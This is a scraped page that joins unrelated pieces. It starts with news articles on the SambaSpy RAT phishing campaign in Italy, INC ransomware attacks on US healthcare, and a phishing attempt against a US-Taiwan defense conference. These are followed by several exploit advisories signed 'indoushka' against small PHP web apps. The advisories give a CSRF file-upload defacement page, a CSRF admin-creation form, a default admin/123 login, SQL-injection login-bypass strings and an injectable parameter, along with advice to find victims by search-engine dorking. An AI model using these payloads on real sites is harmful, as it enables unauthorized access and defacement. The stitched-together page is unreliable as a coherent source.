A previously undocumented malware called SambaSpy is exclusively targeting users in Italy via a phishing campaign orchestrated by a suspected Brazilian Portuguese-speaking threat actor.
"Threat actors usually try to cast a wide net to maximize their profits, but these attackers are focused on just one country," Kaspersky said in a new analysis. "It's likely that the attackers are testing the

A previously undocumented malware called SambaSpy is exclusively targeting users in Italy via a phishing campaign orchestrated by a suspected Brazilian Portuguese-speaking threat actor.

"Threat actors usually try to cast a wide net to maximize their profits, but these attackers are focused on just one country," Kaspersky said in a new analysis. "It's likely that the attackers are testing the waters with Italian users before expanding their operation to other countries."

The starting point of the attack is a phishing email that either includes an HTML attachment or an embedded link that initiates the infection process. Should the HTML attachment be opened, a ZIP archive containing an interim downloader or dropper is used to deploy and launch the multi-functional RAT payload.

The downloader, for its part, is responsible for fetching the malware from a remote server. The dropper, on the other hand, does the same thing, but extracts the payload from the archive instead of retrieving it from an external location.

The second infection chain with the booby-trapped link is a lot more elaborate, as clicking it redirects the user to a legitimate invoice hosted on FattureInCloud if they are not the intended target.

In an alternate scenario, clicking on the same URL takes the victim to a malicious web server that serves an HTML page with JavaScript code featuring comments written in Brazilian Portuguese.

"It redirects users to a malicious OneDrive URL but only if they are running Edge, Firefox, or Chrome with their language set to Italian," the Russian cybersecurity vendor said. "If the users don't pass these checks, they stay on the page."

Users who meet these requirements are served a PDF document hosted on Microsoft OneDrive that instructs the users to click on a hyperlink to view the document, following which they are led to a malicious JAR file hosted on MediaFire containing either the downloader or the dropper as before.

A fully-featured remote access trojan developed in Java, SambaSpy is nothing short of a Swiss Army knife that can handle file system management, process management, remote desktop management, file upload/download, webcam control, keylogging and clipboard tracking, screenshot capture, and remote shell.

It's also equipped to load additional plugins at runtime by launching a file on the disk previously downloaded by the RAT, allowing it to augment its capabilities as needed. On top of that, it's designed to steal credentials from web browsers like Chrome, Edge, Opera, Brave, Iridium, and Vivaldi.

Infrastructure evidence suggests that the threat actor behind the campaign is also setting their sights on Brazil and Spain, pointing to an operational expansion.

"There are various connections with Brazil, such as language artifacts in the code and domains targeting Brazilian users," Kaspersky said. "This aligns with the fact that attackers from Latin America often target European countries with closely related languages, namely Italy, Spain, and Portugal."

**New BBTok and Mekotio Campaigns Target Latin America**

The development comes weeks after Trend Micro warned of a surge in campaigns delivering banking trojans such as BBTok, Grandoreiro, and Mekotio targeting the Latin American region via phishing scams that utilize business transactions and judicial-related transactions as lures.

Mekotio "employs a new technique where the trojan's PowerShell script is now obfuscated, enhancing its ability to evade detection," the company said, highlighting BBTok's use of phishing links to download ZIP or ISO files containing LNK files that act as a trigger point for the infections.

The LNK file is used to advance to the next step by launching the legitimate MSBuild.exe binary, which is present within the ISO file. It subsequently loads a malicious XML file also hidden within the ISO archive, which then leverages rundll32.exe to launch the BBTok DLL payload.

"By using the legitimate Windows utility MSBuild.exe, attackers can execute their malicious code while evading detection," Trend Micro noted.

The attack chains associated with Mekotio commence with a malicious URL in the phishing email that, when clicked, directs the user to a bogus website that delivers a ZIP archive, which contains a batch file that's engineered to run a PowerShell script.

The PowerShell script acts as a second-stage downloader to launch the trojan by means of an AutoHotKey script, but not before conducting a reconnaissance of the victim environment to confirm it's indeed located in one of the targeted countries.

"More sophisticated phishing scams targeting Latin American users to steal sensitive banking credentials and carry out unauthorized banking transactions underscores the urgent need for enhanced cybersecurity measures against increasingly advanced methods employed by cybercriminals," Trend Micro researchers said.

"These trojans \[have\] grown increasingly adept at evading detection and stealing sensitive information while the gangs behind them become bolder in targeting larger groups for more profit."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Brazilian-Linked SambaSpy Malware Targets Italian Users via Phishing Emails

Microsoft has revealed that a financially motivated threat actor has been observed using a ransomware strain called INC for the first time to target the healthcare sector in the U.S.
The tech giant's threat intelligence team is tracking the activity under the name Vanilla Tempest (formerly DEV-0832).
"Vanilla Tempest receives hand-offs from GootLoader infections by the threat actor Storm-0494,

Microsoft has revealed that a financially motivated threat actor has been observed using a ransomware strain called INC for the first time to target the healthcare sector in the U.S.

The tech giant's threat intelligence team is tracking the activity under the name **Vanilla Tempest** (formerly DEV-0832).

"Vanilla Tempest receives hand-offs from GootLoader infections by the threat actor Storm-0494, before deploying tools like the Supper backdoor, the legitimate AnyDesk remote monitoring and management (RMM) tool, and the MEGA data synchronization tool," it said in a series of posts shared on X.

In the next step, the attackers proceed to carry out lateral movement through Remote Desktop Protocol (RDP) and then use the Windows Management Instrumentation (WMI) Provider Host to deploy the INC ransomware payload.

The Windows maker said Vanilla Tempest has been active since at least July 2022, with previous attacks targeting education, healthcare, IT, and manufacturing sectors using various ransomware families such as BlackCat, Quantum Locker, Zeppelin, and Rhysida.

It's worth noting that the threat actor is also tracked under the name Vice Society, which is known for employing already existing lockers to carry out their attacks, as opposed to building a custom version of their own.

The development comes as ransomware groups like BianLian and Rhysida have been observed increasingly using Azure Storage Explorer and AzCopy to exfiltrate sensitive data from compromised networks in an attempt to evade detection.

"This tool, used for managing Azure storage and objects within it, is being repurposed by threat actors for large-scale data transfers to cloud storage," modePUSH researcher Britton Manahan said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Warns of New INC Ransomware Targeting U.S. Healthcare Sector

Hackers sent a convincing lure document, but after 20 years of similar attacks, the target organization was well prepared.

Source: elifbayraktar via Alamy Stock Photo

A meeting of influential figures in and around the US and Taiwanese defense industries has been targeted by a phishing attack carrying fileless malware.

The 23rd US-Taiwan Defense Industry Conference will be held next week in Philadelphia's Logan Square neighborhood. Closed to the press, it will feature speakers from government, defense, academia, and commercial sectors in the US and Taiwan. The focus, according to its website, will be "addressing the future of US defense cooperation with Taiwan, the defense procurement process, and Taiwan's defense and national security needs."

Recently, the US-Taiwan Business Council — the organization behind the event — was sent a malicious forgery of its own registration form. The form was paired with information-stealing malware designed to execute entirely in memory, making it more difficult to detect with traditional antivirus software. Thanks to diligent anti-phishing preparations, however, the council quickly rebuffed the attack.

**Threats to a Taiwan Defense Conference**

Eight years ago, a Chinese phishing email was sent to members of Taiwan's defense industry, including some attendees of the 15th US-Taiwan Defense Industry Conference. Even by then, though, it was old hat.

"In the period from 2003 to 2011, we were heavily targeted with spear-phishing emails constantly," reports Lotta Danielsson, vice president of the US-Taiwan Business Council. "There was an uptick in 2016-2017, but it has been very quiet for the last several years. Usually, it increases in the leadup to and right after the annual defense conference, then it subsides again."

In the leadup to this year's conference, rather than attendees, the attack seemed to target the council itself. It came in an email, from an individual posing as a potential attendee. Rather than use the event's online form, the impersonator sent a filled out copy of the registration form as a PDF, which attendees can do if they experience technical issues with the site.

Source: Cyble

The document, according to analysis from Cyble, came with a ZIP file that was supposed to drop a malicious Windows shortcut (LNK) file. If opened, the LNK would have established persistence on its targeted machine by placing an executable file in the Windows startup folder. Upon reboot, the executable would download additional payloads to be executed directly in the machine's memory, without saving any files to disk. Ultimately, the malware could exfiltrate data back to an attacker-controlled server through Web requests designed to blend with normal network traffic.

Cyble researchers were unable to tie the attack to any specific threat actor. They noted, however, that Chinese entities in particular have a long history of targeting Taiwan.

"We've seen very clearly in the last few years that there are a lot of problems in East Asian geopolitics — military-related movements in the South China Sea, very sharp comments coming from Taiwan and China. And it looks like nation states are interested in US-Taiwan defense cooperation," says Kaustubh Medhe, head of research and intelligence for Cyble.

This latest phishing attempt fits neatly into that picture. "We have a strong suspicion that this could be used as a stealthy technique to perform long-term surveillance of people with a specific interest in this particular topic," he says.

**A Textbook Case of How to Prevent Phishing**

As Danielsson recalls, "We have been targeted by these types of spear phishing emails for a long time — more than 20 years — so we flagged it as suspicious right away. We did not open the file. Instead, we submitted it to VirusTotal and confirmed that it was malicious. Then we deleted it, and that was pretty much it."

She highlights a few keys to success that have helped the Council easily swat away its many phishing attacks over the years. "One is educational, so the entire staff is well educated on these types of attacks. Nobody clicks links in emails, or opens documents sent via email, unless we have talked to people directly and are expecting them. Even then, we often scan them before opening, unless the presumed content is very sensitive, in which case we will call people to double-check that they sent them," she says.

Besides that, she adds, "We keep our email clients text-only so it's easy to see any obfuscation of links right away. I log all traffic in and out of our system and keep an eye out for anomalies. We also take our entire system offline at night and on weekends, air-gapping our computers and internal IT systems. This is doable because we are a small office with three people, something that might be harder for a larger organization. I also have some relationships with people who work in the cybersecurity industry, and they have helped us think through what to do if we do end up failing to prevent an issue. We want to be prepared if it does."

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Phishing Espionage Attack Targets US-Taiwan Defense Conference

Online Traffic Offense version 1.0 suffers from cross site request forgery and arbitrary file upload vulnerabilities.

    =============================================================================================================================================| # Title     : Online Traffic Offense 1.0 Auth by Pass Vulnerability                                                                       || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/traffic_offense_1.zip                                 |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This HTML page is designed to remotely upload arbitrary files and modify script settings.[+] Line 33 : Set your target url[+] save payload as poc.html [+] payload : <!DOCTYPE html><html lang="en"><head>    <meta charset="UTF-8">    <meta name="viewport" content="width=device-width, initial-scale=1.0">    <title>Direct File Upload</title></head><body>    <h2>Direct File Upload</h2>    <form id="uploadForm">        <label for="fileInput">Select File:</label>        <input type="file" id="fileInput" name="fileInput" required><br><br>        <button type="button" onclick="uploadFile()">Upload File</button>    </form>    <script>        function uploadFile() {            const fileInput = document.getElementById('fileInput').files[0];            if (!fileInput) {                alert('Please select a file.');                return;            }            const formData = new FormData();            formData.append('name', '<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>');            formData.append('img', fileInput);            console.log("(+) Uploading file...");            fetch('http://127.0.0.1/traffic_offense/classes/SystemSettings.php?f=update_settings', { // Replace with your upload URL                method: 'POST',                body: formData            })            .then(response => response.text())            .then(data => {                if (data === '1') {                    console.log("(+) File upload seems to have been successful!");                } else {                    console.log("(-) Oh no, the file upload seems to have failed!");                }            })            .catch(error => console.error("(-) Error during file upload:", error));        }    </script></body></html>        Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Online Traffic Offense 1.0 CSRF / Arbitrary File Upload

Online Exam System version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Online Exam System  1.0 Insecure Settings Vulnerability                                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://www.kashipara.com/project/download/project2/user/2024/202406/kashipara.com_exam-zip.zip                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: admin      Password: 123[+] http://127.0.0.1/exam/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Online Exam System 1.0 Insecure Settings

Online Bus Ticket Booking Website version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : online bus ticket booking Website v1.0 Auth By PAss Vulnerability                                                           || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://www.kashipara.com/project/download/project2/user/2024/202406/kashipara.com_online-bus-ticket-booking-.zip           |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] User : 'or''='@gmail.com & PAss = 'or''='[+] http://127.0.0.1/online-bus-ticket-booking-Website/login.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Online Bus Ticket Booking Website 1.0 SQL Injection

Nipah Virus Testing Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Nipah virus (NiV) – Testing Management System 1.0 Auth By Pass Vulnerability                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/nipah-virus-niv-testing-management-system-using-php-and-mysql/                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : USer & PASs : ' or 0=0 ##[+] http://127.0.0.1/nipah-tms/dashboard.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Nipah Virus Testing Management System 1.0 SQL Injection

Membership Management System version 1.1 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Membership Management System 1.1 Auth By Pass Vulnerability                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://codeastro.com/membership-management-system-in-php-with-source-code/                                        |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : USer = ' or 0=0 ## & PASs : ' or 0=0 ##[+] http://127.0.0.1/Membership/dashboard.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Membership Management System 1.1 SQL Injection

HYSCALE System version 1.9 suffers from add administrator and cross site request forgery vulnerabilities.

=============================================================================================================================================  
| # Title     : HYSCALE System v1.9 CSRF add admin Vulnerability                                                                            |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.kashipara.com/project/download/project2/user/2024/202402/kashipara.com_hyscaler19-zip.zip                       |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This HTML page is designed to remotely add new admin.

[+] Line 10 : Set your target url

[+] save payload as poc.html 

[+] payload : 

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Registration Form</title>  
</head>  
<body>

<form action="http://127.0.0.1/HYSCALER19/registration_submit.php" method="POST">

        <label for="username">Username:</label>  
    <input type="text" name="username" id="username" required><br><br>

    <label for="email">Email:</label>  
    <input type="email" name="email" id="email" required><br><br>

    <label for="password">Password:</label>  
    <input type="password" name="password" id="password" required><br><br>

    <label for="dob">Date of Birth:</label>  
    <input type="text" name="dob" id="dob" placeholder="YYYY-MM-DD" required><br><br>

    <label>Gender:</label><br>  
    <input type="radio" name="gender" value="Male" id="male" required>  
    <label for="male">Male</label><br>  
    <input type="radio" name="gender" value="Female" id="female">  
    <label for="female">Female</label><br><br>

    <label for="usertype">User Type:</label>  
    <select name="usertype" id="usertype" required>  
        <option value="admin">Admin</option>  
        <option value="user">User</option>  
        <option value="guest">Guest</option>  
    </select><br><br>

    <label for="target_sales">Target Sales:</label>  
    <input type="text" name="target_sales" id="target_sales" required><br><br>

    <input type="submit" value="Submit">

</form>

</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

HYSCALE System 1.9 Add Administrator / Cross Site Request Forgery

Furniture Master version 2 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Furniture master v2 Sql injection Vulnerability                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://www.kashipara.com/project/download/project2/user/2024/202404/kashipara.com_furniture-master-2-zip.zip      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /prodInfo.php?prodId=1 <===== inject here[+] http://127.0.0.1/furniture_master/prodInfo.php?prodId=1Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Tag

#windows